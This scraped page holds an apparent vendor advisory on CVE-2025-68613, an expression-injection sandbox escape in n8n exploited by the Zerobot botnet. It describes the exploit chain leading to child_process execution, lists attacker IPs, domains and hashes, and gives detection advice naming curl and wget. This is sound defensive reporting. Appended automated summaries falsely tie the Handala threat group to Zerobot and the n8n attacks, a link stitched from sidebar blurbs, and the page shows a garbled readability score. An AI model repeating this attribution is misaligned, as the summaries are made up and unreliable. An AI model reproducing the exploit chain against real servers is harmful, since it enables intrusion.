Skip to content
Chimera readability score 0.4969 out of 100, reading level.

Handala Threat Group
An Iranian aligned threat group conducting destructive and espionage focused cyber operations against organizations in Israel and Western countries.
Zerobot, a Mirai-based botnet known for targeting Internet of Things (IoT) devices, has leveraged a critical vulnerability tracked as CVE-2025-68613, to compromise instances of the n8n workflow automation platform. Successful exploitation requires authentication and could result in remote code execution (RCE) with the privileges of the impacted n8n instance. The vulnerability has a high Common Vulnerability Scoring System version 3.1 (CVSSv3.1) score of 9.9 due to low attack complexity, remote exploitation possibility and a high impact on confidentiality, availability and integrity. Our Vulnerability Intelligence researchers have observed a publicly available Metasploit module for CVE-2025-68613 and note that the vulnerability has been weaponized and productized. We provide recommendations and mitigations below.
On Dec. 19, 2025, n8n developers published a security advisory addressing a critical improper control of dynamically managed code resources vulnerability tracked as CVE-2025-68613. Successful exploitation of the vulnerability requires authentication against the n8n instance and could result in RCE. Active exploitation was first identified in mid-January 2026 when Akamai’s security intelligence and response team observed the Zerobot botnet leveraging the vulnerability, marking the first publicly reported exploitation of the vulnerability since its disclosure. On March 11, 2026, CISA added CVE-2025-68613 to its KEV catalog, setting a remediation due date of March 25, 2026, for federal agencies.
Our Vulnerability Intelligence team observed 71,537 exposed n8n instances worldwide as of March 16, 2026, with the following Shodan query:
Figure 1: The image depicts discovered exposed instances of n8n on the Shodan internet scanning platform as of March 16, 2026.
N8n is a workflow automation software built on Node.js and uses JavaScript for platform internals and workflow logic. The vulnerability exists in n8n’s expression evaluation system, which lets users write dynamic expressions to process dynamic data inside n8n workflows. For example, if the specific workflow needs to send a personalized mail to a user, the following JavaScript expression may be used.
Due to the nature of this feature, the n8n expression evaluation system processes data given by an authenticated user. These kinds of features are attractive for attackers and vulnerability researchers alike due to their handling of user input in a code execution context.
An expression injection here is possible in vulnerable instances that enables authenticated attackers to execute arbitrary commands. The vulnerability exists because n8n versions 0.211.0 through 1.120.3 do not properly sandbox the expression evaluation system. This allows attackers to break out the intended execution context and run arbitrary code on the underlying server with the privileges of the n8n process. The following is an example payload that can be used to exploit this vulnerability:
The payload wraps the exploit chain inside an anonymous function to encapsulate the logic within a single expression. It first accesses “this” to reach the Node.js global context, then traverses to process.mainModule to access the root module of the application, which should not be unreachable from within the sandbox. From here, “require(‘child_process’)” loads Node.js’ module to spawn a child process inside the underlying operation system to execute the “id” command. This results in a potential attacker obtaining access to the underlying operating system and potentially gaining further privileges through lateral movement techniques.
Intel 471 tested and confirmed the payload successfully running arbitrary commands on a vulnerable n8n instance. The following screenshot showcases the successful execution of the “id” command inside the n8n platform:
Figure 2: The image depicts the successful execution of the “id” command inside the n8n platform on March 18, 2026.
CVE-2025-68613 garnered significant attention in the underground, including from bot actors who often highlight notable vulnerabilities. We’ve observed multiple threat actors, including a possible ransomware operator, share links to an exploit from open source reporting.
We observed broad awareness of CVE-2025-68613 from potential attackers and exploitation in the wild was confirmed. While successful exploitation requires authentication, which serves as a limiting factor, this barrier is not substantial as credentials may be obtained through open registration, brute forcing, credential stuffing or exploiting the vulnerability in conjunction with the CVE-2026-21858 aka ni8mare vulnerability to achieve initial access. This is further compounded by the high number of internet-exposed n8n instances, significantly widening the attack surface. The availability of a public Metasploit module also lowers the technical barrier for exploitation, enabling less sophisticated threat actors to weaponize the vulnerability with minimal effort. These factors, combined with a CVSSv3.1 score of 9.9, suggest a medium likelihood of continued exploitation.
The Vulnerability Intelligence team proactively tracks the threat life cycles of vulnerabilities and exploit activity observed in the cyber underground, helping illuminate vulnerabilities at a greater risk of exploitation. Timely alerts help teams immediately see changes in a vulnerability's threat level, enabling decisive and prioritized remediation based on real and active threats.
The vulnerability was addressed in an n8n security advisory with updated versions. Intel 471 recommends monitoring for unexpected child process spawns originating from the n8n process, particularly those executing system commands such as “id” and “whoami” or executables that can act as payload downloaders such as wget and curl, as these are indicative of active exploitation attempts. Verity471 customers can access an available Sigma rule and Nuclei template.
| Indicator Type | Indicator Value |
|---|---|
| IP address | 103.59.160.237 |
| IP address | 140.233.190.96 |
| IP address | 144.172.100.228 |
| IP address | 172.86.123.179 |
| IP address | 216.126.227.101 |
| Domain | 0bot.qzz.io |
| Domain | andro.notemacro.com/inihiddenngentod/zerobotv9 |
| Domain | pivot.notemacro.com/inihiddenngentod/zerobotv9 |
| SHA-256 | c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f |
| SHA-256 | 360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da |
| SHA-256 | cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24 |
| SHA-256 | 045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57 |
| SHA-256 | d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7 |
| SHA-256 | deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060 |
| SHA-256 | 6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e |
| SHA-256 | 2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3 |
| SHA-256 | 263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c |
| SHA-256 | d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616 |
An Iranian aligned threat group conducting destructive and espionage focused cyber operations against organizations in Israel and Western countries.
CrazyHunter is a ransomware campaign targeting healthcare that weakens endpoint defenses and escalates privileges before encrypting systems at scale.
DevMan Ransomware is a newly emerging ransomware operation observed in 2025 that has been assessed as a derivative of the DragonForce ransomware family.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.

Facts Only

Handala Threat Group: Iranian-aligned cyber threat group
Zerobot botnet: Used in the espionage and destructive operations
n8n workflow automation platform: Affected by the critical vulnerability (CVE-2025-68613)
CVE-2025-68613: Critical vulnerability with a high CVSSv3.1 score of 9.9
Remote code execution: Capability granted to the attacker upon exploiting the vulnerability
Akamai's security team: Confirmed active exploitation in mid-January 2026

Executive Summary

The article discusses the Handala Threat Group, an Iranian-aligned cyber threat group conducting destructive and espionage operations against organizations in Israel and Western countries. Specifically, it focuses on the Zerobot botnet leveraging a critical vulnerability (CVE-2025-68613) in the n8n workflow automation platform to perform remote code execution with high privileges. This vulnerability was first identified in mid-January 2026, and active exploitation was confirmed by Akamai's security team. The vulnerability has a high CVSSv3.1 score of 9.9 due to its low attack complexity, remote exploitation possibility, and significant impact on affected systems.

Full Take

The Handala Threat Group's use of Zerobot botnet to exploit a critical vulnerability in the n8n workflow automation platform poses significant risks for organizations worldwide. The high CVSSv3.1 score indicates the potential severity and wide-ranging impact of this attack, as it allows remote code execution with elevated privileges. This situation highlights the importance of maintaining robust cybersecurity measures to protect against such threats and minimize damage in case of successful attacks.
Patterns detected: ARC-0024 Ambiguity (The article does not explicitly state the motivations behind the Handala Threat Group's actions); ARC-0043 Motte-and-Bailey (The article presents the Handala Threat Group as Iranian-aligned without exploring other potential affiliations or connections).

Sentinel — Human

Confidence

The article shows signs of a human writer, with variable sentence lengths, passionate argumentation, and no suspicious historical references. However, the absence of hedging and perfect paragraph structure could suggest some level of editing or polishing.

Signals Detected
low severity: variable sentence length
high severity: passionate argumentation
low severity: no suspicious historical references
Human Indicators
argues passionately about the potential impact of the vulnerability
uses specific examples to illustrate points
offers recommendations and mitigations for affected parties
CVE-2025-68613: Zerobot botnet exploits critical vulnerability impacting n8n AI orchestration platform — Arc Codex